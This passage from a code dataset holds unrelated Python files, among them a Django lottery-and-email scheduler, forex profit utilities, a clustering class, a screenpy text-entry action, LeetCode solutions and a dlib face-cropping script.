5\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"402401802","text":"from .models import *\nfrom django.conf import settings\n\nfrom apscheduler.events import *\nfrom django_apscheduler.jobstores import DjangoJobStore, register_events, register_job\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.executors.pool import ProcessPoolExecutor, ThreadPoolExecutor\nfrom apscheduler.jobstores.sqlalchemy import *\nimport django_rq\nfrom datetime import datetime\nimport pytz\nimport json\nimport logging\nimport time\nimport numpy as np\n\nfrom django.core.mail import send_mail as mail\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template, render_to_string\nfrom django.template import Context\nimport os\n\n########### settings for taskqueue ##########\njobstores = {\n 'default': SQLAlchemyJobStore(url='postgresql+psycopg2://database1_role:database1_password@database1/database1', tablename='apscheduler_jobs')\n}\nexecutors = {\n 'default': ThreadPoolExecutor(20),\n 'processpool': ProcessPoolExecutor(5)\n}\n\njob_defaults = {\n 'coalesce': True,\n 'max_instances': 3\n}\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, daemon=True)\nlogger = logging.getLogger(__name__)\n\ndef schedule_drawing_lottery():\n logger.debug("now scheduling function")\n scheduler.add_job(send_mail, "date", args=['draw-lots'], run_date=settings.DRAWING_LOTS_DATE, timezone="Asia/Tokyo", id="api.tasks.send_mail", replace_existing=True)\n logger.debug("now after scheduler.add_job")\n #scheduler.add_listener(event_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n #register_events(scheduler)\n scheduler.start()\n\n\n\"\"\"\ndef event_listener(event):\n if event.exception:\n print("The job crashed :(")\n else:\n print("The job worked")\n scheduler.shutdown(wait=False)\n\"\"\"\n\n\n########## draw lots ###########\ndef draw_lots():\n dictionary = {}\n for event in Team.EVENT_CHOICES:\n teams = Team.objects.filter(event=event[0], is_registered=True) \n team_ids = [team.pk for team in teams]\n\n winner_teams = []\n if not teams:\n # If no teams entered this event\n winner_teams = []\n\n elif len(teams) <= 
settings.NUMBER_OF_WINNER_TEAMS[event[0]]:\n winner_teams = teams\n else:\n data = []\n for team in teams:\n members = team.members.all()\n admission_years = []\n for member in members:\n scraped_year = int(member.email[3:5])\n rounded_year = round(datetime.now().year, -2)\n admission_year = rounded_year + scraped_year if rounded_year < rounded_year + scraped_year < rounded_year + 100 else rounded_year + scraped_year - 100 \n if not datetime.now().year - 3 <= admission_year <= datetime.now().year:\n admission_year = datetime.now().year - 3\n\n admission_years.append(admission_year)\n\n average = np.mean(admission_years)\n data.append(average)\n\n data = np.array(data)\n data = datetime.now().year - data\n data = np.sum(data) - data\n data = data / np.sum(data) # Now, data is a list of probabilities\n\n winner_ids = np.random.choice(team_ids, size=settings.NUMBER_OF_WINNER_TEAMS[event[0]], replace=False, p=data)\n\n for id in winner_ids:\n try:\n team = Team.objects.get(pk=id)\n winner_teams.append(team)\n except Team.DoesNotExist:\n pass\n\n for id in team_ids:\n if id not in winner_ids:\n try:\n team = Team.objects.get(pk=id)\n team.is_registered = False\n team.save()\n except Team.DoesNotExist:\n pass\n \n dictionary[event[0]] = winner_teams\n\n return dictionary\n\ndef send_mail(function, team=None, member_changed=None):\n module_dir = os.path.dirname(__file__)\n\n if function == 'team-create':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-create/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-create/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'team-update':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-update/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-update/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'team-delete':\n for member in team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/team-delete/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/team-delete/body.html', {'member': member, 'team': team})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'member-create':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-create/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-create/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} 
<{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'member-update':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-update/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-update/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n elif function == 'member-delete':\n for member in member_changed.team.members.all():\n title = open(os.path.join(module_dir, 'templates/mail/member-delete/subject.txt'), 'r', encoding='utf-8').read()\n msg_html = render_to_string('mail/member-delete/body.html', {'member': member, 'member_changed': member_changed})\n msg = EmailMessage(subject=title, body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send() \n elif function == 'draw-lots':\n winners = draw_lots()\n print(winners)\n titles = {}\n titles['winner'] = open(os.path.join(module_dir, 'templates/mail/winner/subject.txt'), 'r', encoding='utf-8').read()\n titles['loser'] = open(os.path.join(module_dir, 'templates/mail/loser/subject.txt'), 'r', encoding='utf-8').read()\n\n for event, winner_teams in winners.items():\n if len(winner_teams) > 0:\n all_teams = Team.objects.filter(event=event)\n for team in all_teams:\n members = team.members.all()\n for member in members:\n if team in winner_teams:\n msg_html = render_to_string('mail/winner/body.html', {'member': member})\n msg = EmailMessage(subject=titles['winner'], body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()\n print(\"send message\")\n else:\n msg_html = render_to_string('mail/loser/body.html', {'member': member})\n msg = EmailMessage(subject=titles['loser'], body=msg_html, from_email='{from_name} <{from_address}>'.format(from_name=settings.FROM_NAME, from_address=settings.FROM_ADDRESS), bcc=['{to_name} <{to_address}>'.format(to_name=member.name, to_address=member.email)])\n msg.content_subtype = \"html\"\n msg.send()","sub_path":"backend/sportsfes/api/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253176923","text":"n = int(input())\n\n\nv = [int(c) for c in input().split()]\nll = len(v)\nv1 = [0 for _ in range(10**6)]\nv2 = [0 for _ in range(10**6)]\nfor i in range(n):\n if i % 2 == 0:\n v1[v[i]] += 1\n else:\n v2[v[i]] += 1\n\nif v1.index(max(v1)) == v2.index(max(v2)):\n m1 = sorted(set(v1))[-2]\n m2 = sorted(set(v2))[-2]\n ans = min(n-m1-max(v2), n-max(v1)-m2)\n print(ans)\nelse:\n 
print(n-max(v1)-max(v2))\n","sub_path":"Problems/C/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"265717235","text":"import autograd.numpy as np\nfrom Frameworkk.NMF import NMF\nfrom autograd import grad\n\n\nclass NMF_NN(NMF):\n def __init__(self, n_components=0, data=None, scale=.1, layer_sizes=[]):\n NMF.__init__(self, n_components, data)\n self.NET_DEPTH = len(layer_sizes) - 1\n row_size, col_size = data.shape\n self.parameters = self.init_random_params(scale, layer_sizes)\n # Append column latents to end.\n self.parameters.append(scale * np.random.rand(n_components, col_size))\n self.parameters.append(self.data)\n self.parameters = list(self.parameters)\n self.train = self.train_neural_net\n self.inference = self.neural_net_inference\n\n # Credit to David Duvenaud for sleek init code\n def init_random_params(self, scale, layer_sizes, rs=np.random.RandomState(0)):\n \"\"\"Build a list of (weights, biases) tuples,\n one for each layer in the net.\"\"\"\n return [(scale * rs.randn(m, n), # weight matrix\n scale * rs.randn(n)) # bias vector\n for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\n\n def train_neural_net(self, alpha=.0001, max_iter=20, latent_indices=None, data=None):\n train_data = self.data if data is None else data\n for iter in range(0, max_iter):\n # Get gradients\n grads = grad(self.loss, 0)(self.parameters, train_data)\n\n # Update parameters\n for i in range(self.NET_DEPTH):\n # Updating net weights\n self.parameters[i] = [self.parameters[i][0] - alpha * grads[i][0],\n self.parameters[i][1] - alpha * grads[i][1]]\n # Updating col_latents\n self.parameters[self.NET_DEPTH] += -alpha * grads[self.NET_DEPTH]\n\n def neural_net_inference(self, parameters, data=None):\n net_parameters = parameters[:self.NET_DEPTH]\n colLatents = parameters[self.NET_DEPTH]\n\n # This is broken and stupid\n unweighted_user_latents = self.neural_net_predict(net_parameters, np.transpose(colLatents))\n return np.dot(unweighted_user_latents, colLatents)\n\n def neural_net_predict(self, net_parameters, input_data):\n # Assume 3 layer net, so net_parameters\n W1, b1 = net_parameters[0]\n W2, b2 = net_parameters[1]\n layer2 = relu(np.dot(input_data, W1) + b1)\n layer3 = relu(np.dot(layer2, W2) + b2)\n return layer3\n\n\ndef relu(data):\n return np.maximum(data, 0)\n","sub_path":"Framework/NMF_NN.py","file_name":"NMF_NN.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569611700","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport hdbscan\n\n\nclass NestedHDBSCAN():\n def __init__(self):\n pass\n\n def run_clusterer(self, x):\n clusterer = hdbscan.HDBSCAN(min_cluster_size=5, gen_min_span_tree=True, metric='correlation')\n clusterer.fit(x)\n return clusterer.labels_\n\n def extract_features(self, x):\n pca = PCA(n_components=0.95)\n x = pca.fit_transform(x)\n return x\n\n def fit_transform(self, x):\n x = self.extract_features(x)\n labels = self.run_clusterer(x)\n return labels\n\n def run(self, X, Y):\n Y['cluster_id'] = -1\n while True:\n x_iter = X\n x_iter = x_iter.loc[Y['cluster_id'] == -1]\n if x_iter.size == 0:\n break\n labels = self.fit_transform(x_iter)\n if len(np.unique(labels)) == 1:\n break\n offset = Y['cluster_id'].max() + 1\n labels[labels == -1] = -1 - offset\n Y.loc[x_iter.index, 'cluster_id'] = labels + offset\n 
return Y\n","sub_path":"mstools/cluster/dbscan/NestedHDBSCAN.py","file_name":"NestedHDBSCAN.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"254091258","text":"import datetime\nimport math\n\nDATE_TIME_OANDA_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'\n\n\ndef datetime_to_string(in_datetime):\n return in_datetime.strftime(DATE_TIME_OANDA_FORMAT)\n\n\ndef is_datetime_on_the_granularity(in_datetime, granularity):\n # TODO Support days, weeks, months, years\n time_in_seconds = (in_datetime.hour * 60 * 60) + (in_datetime.minute * 60) + in_datetime.second\n\n resolution = get_granularity_in_seconds(granularity)\n\n return (time_in_seconds % resolution) == 0\n\n\ndef round_time(dt, granularity):\n \"\"\"Round a datetime object to any time lapse in seconds\n dt : datetime.datetime object, default now.\n roundTo : Closest number of seconds to round to, default 1 minute.\n Author: Thierry Husson 2012 - Use it as you want but don't blame me.\n http://stackoverflow.com/questions/3463930/how-to-round-the-minute-of-a-datetime-object-python\n \"\"\"\n round_to = get_granularity_in_seconds(granularity)\n\n seconds = (dt - dt.min).seconds\n # // is a floor division, not a comment on following line:\n rounding = (seconds + round_to / 2) // round_to * round_to\n return dt + datetime.timedelta(0, rounding - seconds, -dt.microsecond)\n\n\ndef get_granularity_in_seconds(granularity_str):\n \"\"\"\n Get the granularity in seconds.\n :param granularity_str:\n :return:\n \"\"\"\n if granularity_str == "S5":\n return 5\n elif granularity_str == "S10":\n return 10\n elif granularity_str == "S15":\n return 15\n elif granularity_str == "S30":\n return 30\n elif granularity_str == "M1":\n return 60\n elif granularity_str == "M2":\n return 60 * 2\n elif granularity_str == "M3":\n return 60 * 3\n elif granularity_str == "M4":\n return 60 * 4\n elif granularity_str == "M5":\n return 60 * 5\n elif granularity_str == "M10":\n return 60 * 10\n elif granularity_str == "M15":\n return 60 * 15\n elif granularity_str == "M30":\n return 60 * 30\n elif granularity_str == "H1":\n return 60 * 60 * 1\n elif granularity_str == "H2":\n return 60 * 60 * 2\n elif granularity_str == "H3":\n return 60 * 60 * 3\n elif granularity_str == "H4":\n return 60 * 60 * 4\n elif granularity_str == "H8":\n return 60 * 60 * 8\n elif granularity_str == "H12":\n return 60 * 60 * 12\n elif granularity_str == "D1":\n return 60 * 60 * 24 * 1\n else:\n raise LookupError("Unable to convert granularity to seconds")\n\n\ndef calc_profit_loss(home_currency, instrument, units, side, open_price, close_price):\n \"\"\"\n Calculate the profit/loss\n :param home_currency:\n :param instrument:\n :param units:\n :param side:\n :param open_price:\n :param close_price:\n :return:\n \"\"\"\n # Example: AUD/USD -> BASE/QUOTE\n base_currency = instrument[:3]\n quote_currency = instrument[4:]\n\n if side == 'SELL':\n profit_loss = units * (open_price - close_price)\n elif side == 'BUY':\n profit_loss = units * (close_price - open_price)\n else:\n raise Exception("Expecting a side of 'BUY' or 'SELL' when calculating profit/loss.")\n\n if quote_currency == home_currency: # EUR_USD, GBP_USD (home currency in the second position)\n # PL = UNITS * (OPEN - CLOSE)\n return profit_loss\n elif base_currency == home_currency: # USD_JPY, USD_CAD (home currency in the first position)\n # PL = (UNITS * (OPEN - CLOSE)) / CLOSE\n return profit_loss / 
close_price\n else:\n raise Exception('Cannot handle this currency pair. Pair does not contain the home currency.')\n\n\ndef calculate_position_size(instrument, home_currency, open_price, stop_loss, dollar_amount_to_risk):\n # Example: AUD/USD -> BASE/QUOTE\n base_currency = instrument[:3]\n quote_currency = instrument[4:]\n\n one_r = dollar_amount_to_risk\n if quote_currency == home_currency: # '???_USD'\n # UNITS = PL / (OPEN - CLOSE)\n return one_r / (math.fabs(open_price - stop_loss))\n elif base_currency == home_currency: # 'USD_???'\n # UNITS = (PL * CLOSE) / (OPEN - CLOSE)\n return (one_r * stop_loss) / (math.fabs(open_price - stop_loss))\n else:\n raise Exception('Cannot handle this currency pair. Pair does not contain the home currency.')","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"644122137","text":"\"\"\"\nAn action to enter text into an input field. An actor must possess the\nability to BrowseTheWeb to perform this action. An actor performs this\naction like so:\n\n the_actor.attempts_to(\n Enter.the_text("Hello!").into_the(GREETINGS_INPUT)\n )\n\n the_actor.attempts_to(\n Enter.the_text("Bye!").into_the(CHAT_INPUT).then_hit(Keys.ENTER)\n )\n\"\"\"\n\n\nfrom functools import partial\nfrom typing import List, Union\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom ..actor import Actor\nfrom ..exceptions import DeliveryError, UnableToAct\nfrom ..pacing import aside, beat\nfrom ..target import Target\nfrom .base_action import BaseAction\nfrom .hold_down import KEY_NAMES\n\n\nclass Enter(BaseAction):\n \"\"\"\n Enter text into an input field. An Enter action is expected to be\n instantiated by its static |Enter.the_text| method. A typical\n invocation might look like:\n\n Enter.the_text("Hello world!").into_the(COMMENT_FIELD)\n\n It can then be passed along to the |Actor| or added to a |Chain| to\n perform the action.\n \"\"\"\n\n text: str\n target: Union[None, Target]\n following_keys: List[str]\n\n @staticmethod\n def the_text(text: str) -> \"Enter\":\n \"\"\"\n Provide the text to enter into the field. It is expected the next\n call will be to the instantiated Enter object's |Enter.into| method.\n\n Args:\n text: the text to enter into the |Target|.\n\n Returns:\n |Enter|\n \"\"\"\n return Enter(text)\n\n the_keys = the_text\n\n @staticmethod\n def the_secret(text: str) -> \"Enter\":\n \"\"\"\n Provide the text to enter into the field, but note that the text\n should be masked in the log. The text will appear as "[CENSORED]".\n It is expected that the next call will be to the instantiated Enter\n object's |Enter.into| method.\n\n Args:\n text: the text to enter into the |Target|, but it's a secret.\n\n Returns:\n |Enter|\n \"\"\"\n return Enter(text, mask=True)\n\n the_password = the_secret\n\n def into_the(self, target: Target) -> \"Enter\":\n \"\"\"\n Specify the target to enter the text into. This is most likely an\n input field.\n\n Args:\n target: The |Target| describing the input field.\n\n Returns:\n |Enter|\n \"\"\"\n self.target = target\n return self\n\n on = into = into_the\n\n def then_hit(self, *keys: str) -> \"Enter\":\n \"\"\"\n Supply additional keys to hit after entering the text, for example if\n the keyboard ENTER key should be pressed.\n\n Args:\n keys: the keys to hit afterwards. 
These are probably the\n constants from Selenium's |Keys|, but can also be a string.\n\n Returns:\n |Enter|\n \"\"\"\n self.following_keys.extend(keys)\n return self\n\n then_press = then_hit\n\n @beat(\"{0} enters '{text_to_log}' into the {target}.\")\n def perform_as(self, the_actor: Actor) -> None:\n \"\"\"\n Direct the actor to enter the text into the targeted input field. If\n this Enter object's |Enter.then_hit| method was called, it will also\n hit the supplied keys.\n\n Args:\n the_actor: the |Actor| who will perform this action.\n\n Raises:\n |DeliveryError|: an exception was raised by Selenium.\n |UnableToAct|: no target was supplied.\n |UnableToPerform|: the actor does not have the ability to\n |BrowseTheWeb|.\n \"\"\"\n if self.target is None:\n raise UnableToAct(\n \"Target was not supplied for Enter. Provide a target by using either \"\n \"the .into(), .into_the(), or .on() method.\"\n )\n\n element = self.target.found_by(the_actor)\n\n try:\n element.send_keys(self.text)\n for key in self.following_keys:\n aside(f\"then hits the {key} key\")\n element.send_keys(key)\n except WebDriverException as e:\n msg = (\n \"Encountered an issue while attempting to enter text into \"\n f\"{self.target}: {e.__class__.__name__}\"\n )\n raise DeliveryError(msg).with_traceback(e.__traceback__)\n\n @beat(\" Enter the text {text_to_log} into the {target}!\")\n def add_to_chain(self, the_actor: Actor, the_chain: ActionChains) -> None:\n \"\"\"\n Add the Enter action to an in-progress |Chain| of actions.\n\n Args:\n the_actor: the |Actor| who will be performing the action chain.\n the_chain: the |ActionChains| instance that is being built.\n \"\"\"\n if self.target is None:\n send_keys = the_chain.send_keys\n else:\n element = self.target.found_by(the_actor)\n send_keys = partial(the_chain.send_keys_to_element, element)\n\n send_keys(self.text)\n for key in self.following_keys:\n send_keys(key)\n\n def __init__(self, text: str, mask: bool = False) -> None:\n self.text = text\n self.target = None\n self.following_keys = []\n\n if mask:\n self.text_to_log = \"[CENSORED]\"\n else:\n altered_text = text\n for value, keyname in KEY_NAMES.items():\n altered_text = altered_text.replace(value, keyname)\n self.text_to_log = altered_text\n","sub_path":"screenpy/actions/enter.py","file_name":"enter.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607824812","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport model\nfrom monitor import napmonitor\n\nmodel_dir = './model2/'\nmnist = input_data.read_data_sets(\"mnist_data\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\ny_ = tf.placeholder(tf.float32, [None, 10])\nimage = tf.reshape(x, [-1, 28, 28, 1])\nkeep_prob = tf.placeholder(tf.float32)\ny, _ = model.model3(image, keep_prob)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsess = tf.Session()\nsaver = tf.train.Saver()\nsaver.restore(sess, tf.train.latest_checkpoint(model_dir))\nprint('restore succeed.')\n\ntest_images1 = mnist.test.images[:, :]\ntest_labels1 = mnist.test.labels[:, :]\n\n# print(y.eval(session=sess, feed_dict={x: test_images1, y_: test_labels1, keep_prob: 1.0}))\nprint('Accuracy of the network on the 10000 test images: {} %'.format(100 * accuracy.eval(session=sess, feed_dict={x: test_images1, y_: test_labels1, 
keep_prob: 1.0})))\n\n# test_images2 = mnist.test.images[5000:, :]\n# test_labels2 = mnist.test.labels[5000:, :]\n#\n# #print(y.eval(session=sess, feed_dict={x: test_images2, y_: test_labels2, keep_prob: 1.0}))\n# print(accuracy.eval(session=sess, feed_dict={x: test_images2, y_: test_labels2, keep_prob: 1.0}))\n\nsess.close()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"442503972","text":"class Solution(object):\n def lastRemaining(self, n):\n head = 1\n step = 1\n remain = n\n status = True\n while remain > 1:\n if status or remain % 2 == 1:\n head += step\n step *= 2\n remain /= 2\n status = not status\n return head\n \n#time limited\n#1\nclass Solution(object):\n def lastRemaining(self, n):\n a = list(range(1, n+1))\n cnt = 0\n while (len(a) > 1):\n if cnt % 2 == 0:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n cnt += 1\n a = list(reversed(a))\n else:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n a = list(reversed(a))\n cnt += 1\n return a[0]\n \n#2\nclass Solution(object):\n def lastRemaining(self, n):\n nums = [i for i in range(1, n+1)]\n left_to_right = True\n while(len(nums) > 1):\n if left_to_right:\n nums = nums[1::2]\n left_to_right = False\n else:\n nums = nums[-2::-2][::-1]\n left_to_right = True\n return nums[0]\n \n#3\ndef lastRemaining(self, n):\n a = list(range(1, n+1))\n cnt = 0\n while (len(a) > 1):\n if cnt % 2 == 0:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n cnt += 1\n else:\n if len(a) % 2 == 1:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n else:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 0]\n cnt += 1\n return a[0]\n","sub_path":"python/390 Elimination Game.py","file_name":"390 Elimination Game.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327146307","text":"# 2. Write a program that reads the length of the base and the height of a right-angled triangle and prints\n# the area. 
Every number is given on a separate line.\n\n\ndef formula(): #function is used\n base=float(input('Enter the Base of right-angled triangle : ')) #user input\n height=float(input('Enter the height of right-angled triangle : ')) #user input\n\n area_of_RAT=(1/2)*base*height #formula to calculate the area of triangle\n\n return area_of_RAT\n\nprint(formula()) #call the function for output\n\n\n","sub_path":"Lab_Exercise_1/Lab_Exercise_1_Solutions/lab1 Q2.py","file_name":"lab1 Q2.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"646398530","text":"c = int(input())\nli = []\nfor i in range(c):\n\tli.append(input().split(\" \"))\n\tfor j in range(len(li[i])):\n\t\tli[i][j] = int(li[i][j])\n\nfor i in range(c):\n\tfor j in range(1,min(li[i])+1):\n\t\tif(li[i][0] % j == 0 and li[i][1] % j == 0):\n\t\t\tgcd = j\n\n\tlcm = int((li[i][0] * li[i][1]) / gcd)\n\n\tprint(lcm, gcd)","sub_path":"2702.py","file_name":"2702.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"137273559","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tests/test_utils.py\n# Compiled at: 2013-07-27 09:03:17\nfrom pymills.utils import notags\n\ndef test_notags():\n s = 'foo'\n x = notags(s)\n assert x == 'foo'","sub_path":"pycfiles/pymills-3.4.2-py2.7/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"227640606","text":"import csv\nimport os\nimport json\nimport sys\nimport pandas as pd\nimport gridfs\nfrom cr.db.store import global_settings, connect\n\n\ndef load_data(filename, settings=None, clear=None):\n if settings is None:\n settings = global_settings\n global_settings.update(json.load(file(sys.argv[1])))\n\n db = connect(settings)\n\n obj_name = os.path.basename(filename).split('.')[0]\n\n collection = getattr(db, obj_name)\n\n if clear:\n collection.remove()\n\n with file(filename) as the_file:\n objs = json.load(the_file)\n for obj in objs:\n collection.insert(obj)\n\n\ndef load_bulk_data(filename, settings=None, clear=None):\n if settings is None:\n settings = global_settings\n global_settings.update(json.load(file(sys.argv[1])))\n\n db = connect(settings)\n\n obj_name = os.path.basename(filename).split('.')[0]\n\n collection = getattr(db, obj_name)\n\n if clear:\n collection.remove()\n\n with file(filename) as the_file:\n objs = json.load(the_file)\n collection.insert_many(objs)\n\n\ndef load_dataset(csv_filename, db, h=None):\n '''\n Requirements: pandas\n Using pandas to load the csv file (chunk size is useful when file is big),\n all the fields will be automatically cast to the right type of data.\n '''\n\n file_csv = pd.read_csv(csv_filename, header=h, chunksize=1000)\n\n for df in file_csv:\n\n gender_unique = {v: k for k, v in enumerate(df.iloc[:, -1].unique())}\n df.iloc[:, -1] = df.iloc[:, -1].apply(lambda x: gender_unique[x] if x != None else gender_unique[\n x]) # this produces an int64 type on gender column\n\n categorical = df.select_dtypes(include='object').apply(\n pd.factorize) # Encode the object as an enumerated type or categorical variable (integer values).\n bools = df.select_dtypes(include='bool') # Cast booleans to 
bool\n others = df.select_dtypes(exclude=['bool', 'object']) # get all the other columns of the dataframe\n\n headers = list(categorical.index) + list(bools.columns) + list(others.columns)\n\n columns = [a[0].tolist() for a in categorical.values] + \\\n [list(bools[col]) for col in bools] + \\\n [list(others[col]) for col in others]\n\n data = {'headers': headers,\n 'columns': columns\n }\n\n return db.datasets.insert(data)\n","sub_path":"cr-db/cr/db/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416469169","text":"import dlib\r\nimport cv2\r\nimport os\r\n\r\ninput_folder = 'D:\\\\CBSR_database\\\\test_release\\\\test_release'\r\noutput_folder = 'D:\\\\Face'\r\n\r\ncount = 0\r\n\r\nfor root, dirs, files in os.walk(input_folder):\r\n for f in files:\r\n\r\n cap = cv2.VideoCapture(root+\"\\\\\"+f) # 開啟影片檔案\r\n\r\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # 取得畫面尺寸\r\n\r\n detector = dlib.get_frontal_face_detector() # Dlib的人臉偵測器\r\n\r\n face_filename = 1\r\n\r\n cap.read()\r\n last_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\r\n frame_counter = 1\r\n\r\n while cap.isOpened() and frame_counter < last_frame: # 以迴圈從影片檔案讀取影格,並顯示出來\r\n ret, frame = cap.read()\r\n\r\n # 偵測人臉\r\n face_rects, scores, idx = detector.run(frame, 0)\r\n\r\n # 取出所有偵測的結果\r\n for i, d in enumerate(face_rects):\r\n\r\n x1 = d.left()\r\n y1 = d.top()\r\n x2 = d.right()\r\n y2 = d.bottom()\r\n # 以方框標示偵測的人臉\r\n\r\n crop_img = frame[y1-100:y2+100, x1-100:x2+100]\r\n cv2.imwrite(output_folder + '\\\\' + f + \"_{0}.png\".format(face_filename), crop_img)\r\n\r\n cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 4, cv2.LINE_AA)\r\n\r\n face_filename += 1\r\n frame_counter += 1\r\n\r\n cv2.imshow('Face Detection', frame) # 顯示結果\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"face_good/video_catch3.py","file_name":"video_catch3.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109339398","text":"# Copyright 2014 Google Inc. 
